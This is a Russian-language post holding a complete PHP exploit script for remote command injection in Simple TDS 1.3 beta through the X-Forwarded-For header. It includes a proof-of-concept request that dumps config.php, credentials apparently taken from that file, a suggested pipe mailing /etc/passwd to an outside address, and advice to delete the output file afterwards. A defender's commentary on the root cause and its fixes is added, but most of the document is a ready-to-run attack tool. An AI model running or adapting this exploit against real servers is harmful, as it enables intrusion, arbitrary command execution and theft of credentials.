Злоумышленник может внедрять собственные команды в контексте функции shell_exec() через переменную $ip (скрипт go.php), благодаря отсутствию фильтрации. Эксплойт ниже:
/* * 0x48k-stds13b-shellexec.php * © hellknights.void.ru * ======================== * * EXPLOIT: Simple TDS <= 1.3 beta * VULNERABILITY: shell_exec() Remote Command Injection Exploit * * ADVISORY: * ========= * * User can inject commands to shell_exec() function via $ip (go.php script): * * line#45: $ip = @getip(); * line#57: $addr = @explode (' ', @shell_exec ('' . $geoip_path . ' ' . $ip)); * * $ip value could be set via "X-Forwarded-For" HTTP web-server environment (get_ip() function begins at line#9): * * function getip () * { * if ((@getenv('HTTP_CLIENT_IP') AND @strcasecmp(@getenv('HTTP_CLIENT_IP'), 'unknown'))) * { * $ip = @getenv('HTTP_CLIENT_IP'); * } * else * { * if ((@getenv('HTTP_X_FORWARDED_FOR') AND @strcasecmp(@getenv('HTTP_X_FORWARDED_FOR'), 'unknown'))) * { * $ip = @getenv('HTTP_X_FORWARDED_FOR'); * } * ... * * Also hacker can use the "archive" directory (chmod 777) for command output or pipes for mailing stdout (cat /etc/passwd | mail h4xx0r@gmail.com). * * PROOF-OF-CONCEPT (reading config.php file): * =========================================== * * $ telnet localhost 80 * GET /stds_1_3beta/go.php HTTP/1.0 * User-Agent: l33th4x0r * X-Forwarded-For: 127.0.0.1; cat config.php > ./archive/tmp.txt * Host: localhost * * $ GET ]]>[url="http://forum.prologic.su/go.php?http://localhost/stds_1_3beta/archive/tmp.txt"]http://localhost/std...ve/tmp.txt[/url]]]> * * * $mysql_host = "localhost"; * $mysql_login = "root"; * $mysql_password = "z3r0d4yy; * $my_database = "stds"; * * $password = "fhutynbyf"; * ... 
*/
// --- Defender's reading of the advisory above ------------------------------
// Root cause (go.php, as quoted in the header): the X-Forwarded-For /
// Client-IP request header is copied into $ip and then concatenated, unquoted,
// into a shell_exec() command line. Every request header is caller-controlled,
// so a ';' inside it terminates the geoip command and starts another.
// Remediation on the vulnerable side:
//   * avoid shelling out for a per-request lookup at all (a GeoIP PHP extension
//     or library needs no subprocess); if a subprocess is unavoidable, validate
//     first -- filter_var($ip, FILTER_VALIDATE_IP) -- and pass the value
//     through escapeshellarg();
//   * take the client address from REMOTE_ADDR and honour forwarded headers only
//     for requests arriving from a trusted reverse proxy;
//   * do not keep a world-writable, web-served directory (archive/); that is
//     what turns command execution into retrievable output here.
// Detection: request headers are absent from default access logs, so a WAF /
// request-logging rule flagging shell metacharacters in X-Forwarded-For, plus
// monitoring for new files under archive/, are the observable signals.

// Open a TCP connection, write one raw HTTP request and, when $recv is truthy,
// echo the response until EOF. Terminates the whole script if connecting fails.
//   $host, $port  passed straight to fsockopen()
//   $packet       raw request bytes, written verbatim (no TLS)
//   $recv         when truthy, read the response with fgets() until feof()
// Returns nothing.
function SendPacket($host, $port, $packet, $recv) {
    $sock = fsockopen($host,$port,$errno,$errstr);
    if (!$sock){
        // $errno / $errstr are collected but never reported.
        die("\ncant connect to remote server");
    } else {
        fputs ($sock, $packet);
        if($recv) {
            while (!feof($sock)) {
                $out=fgets($sock,99999);
                echo $out;
            }
        }
    }
    fclose ($sock);
}

// Inclusive byte-range copy: returns $string[$offset_from .. $offset_to] built
// one character at a time (a hand-rolled substr()). Indexing is byte-wise and
// offsets are not clamped, so an offset at or past strlen() is an
// uninitialized string offset rather than an empty result.
function strxcut($string, $offset_from, $offset_to) {
    $str_to = NULL;
    for($i=$offset_from; $i <= $offset_to; $i++) {
        $str_to .= $string[$i];
    }
    return $str_to;
}

// Console hex dump of $string: 15 bytes per row, all hex rows first, then the
// printable-ASCII rows with bytes <= 32 or > 126 rendered as '.'.
function quick_dump($string) {
    $result='';$exa='';$cont=0;
    for ($i=0; $i<=strlen($string)-1; $i++) {
        // Bitwise '|' on two booleans -- equivalent to '||' here, since both
        // operands are 0/1.
        if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];}
        // dechex() drops the leading zero for bytes < 0x10; pad to two digits.
        if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));}
        // Row break every 15 bytes, in both columns.
        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
    }
    return $exa."\r\n".$result;
}

// usage information
echo "\r\n";
echo "0x48k-stds13b-shellexec.php\r\n";
echo "Simple TDS <= 1.3 shell_exec() Remote Command Injection Exploit\r\n";
echo "© hellknights.void.ru\r\n";
// Positional CLI arguments: host port path output cmd...; fewer than five
// prints usage and exits.
if ($argc<5) {
    echo "Usage: php ".$argv[0]." host port path output cmd\r\n";
    echo "host: target server (ip/hostname)\r\n";
    echo "port: target web-server's port\r\n";
    echo "path: path to Simple TDS\r\n";
    echo "output: output file (use ./archive/stats/index.html)\r\n";
    echo "cmd: a shell command\r\n";
    echo "\n\nExamples:\r\n";
    echo "(1) READ CONFIG.PHP FILE:\nphp ".$argv[0]." localhost 80 /stds/ ./archive/index.html cat config.php\r\n";
    echo "(2) DONT FORGET TO DELETE OUTPUT FILE:\nphp ".$argv[0]." 
localhost 80 /stds/ ./archive/index.html rm ./archive/index.html\r\n";
    die;
}

// some configs
$user_agent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)";
// File name that, when present in $output, marks where the web path is cut.
$get_root_index = "index.html";
// Print a hex dump of each request before it is sent.
$dump_output = TRUE; // FALSE;
// Leading, well-formed address that precedes the injected ';' in the header.
$xforward_ip = "127.0.0.1";
echo "-----------------------------------\r\n";
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$output = $argv[4];
$cmd = $argv[5];
$file_output = TRUE;
echo "host: ".$host."\r\n";
echo "port: ".$port."\r\n";
echo "path: ".$path."\r\n";
echo "output: ".$output."\r\n";
// Every argument after the fifth is appended to the command, space-separated.
if($argc > 5) {
    for($i = 6; $i < $argc; $i++) {
        $cmd = $cmd." ".$argv[$i];
    }
}
echo "cmd: ".$cmd."\r\n";
// NOTE: $cmd_inject is assembled here but not referenced again below; the
// request header further down is built from $cmd directly.
$cmd_inject = "$cmd";
// output to file ? (if rm output_file)
// Loose '==' comparison against the two literal forms of a delete command.
if($cmd == "rm $output" || $cmd == "del $output"){
    $file_output = FALSE;
}
if($file_output){
    $cmd_inject .= " > $output";
}
// output file (if ./archive/index.html, then GET /archive/ only)
// Derive the URL path used to fetch the output file: strip a leading "./" or
// "/" and stop just before $get_root_index when it occurs (strpos() position
// 0 is treated the same as "not found" by the '!' test).
$pos_to = strpos($output, $get_root_index);
if(!$pos_to){
    $pos_to = strlen($output);
}
else{
    $pos_to = $pos_to-1;
}
$pos_from = 0;
if($output[0].$output[1] == "./"){
    $pos_from = 2;
}
else if($output[0] == "/"){
    $pos_from = 1;
}
$web_output = strxcut($output, $pos_from, $pos_to);
echo "-----------------------------------\r\n";
// exploit
// First request: the X-Forwarded-For header is the injection vector described
// in the header comment; go.php copies it into $ip and hands it to shell_exec().
$packet = "GET ".$path."go.php HTTP/1.0\r\n".
    "User-Agent: $user_agent\r\n".
    "X-Forwarded-For: $xforward_ip; $cmd > $output\r\n".
    "Host: $host\r\n\r\n";
echo "\r\n\r\n[+] sending exploit...\r\n\r\n";
if($dump_output) echo quick_dump($packet);
SendPacket($host, $port, $packet, FALSE);
// Second request: plain GET of the redirected output from the web-served
// archive/ directory; response is echoed to the console.
$packet = "GET ".$path."$web_output HTTP/1.0\r\n".
    "User-Agent: $user_agent\r\n".
    "Host: $host\r\n\r\n";
if($file_output) {
    echo "\r\n\r\n[+] get command result from output file...\r\n\r\n";
    if($dump_output) echo quick_dump($packet);
    echo "\r\n\r\n";
    SendPacket($host, $port, $packet, TRUE);
    echo "\r\n\r\n[+] exploited.\ndont forget to delete output file: rm $output\r\n\r\n";
}
?>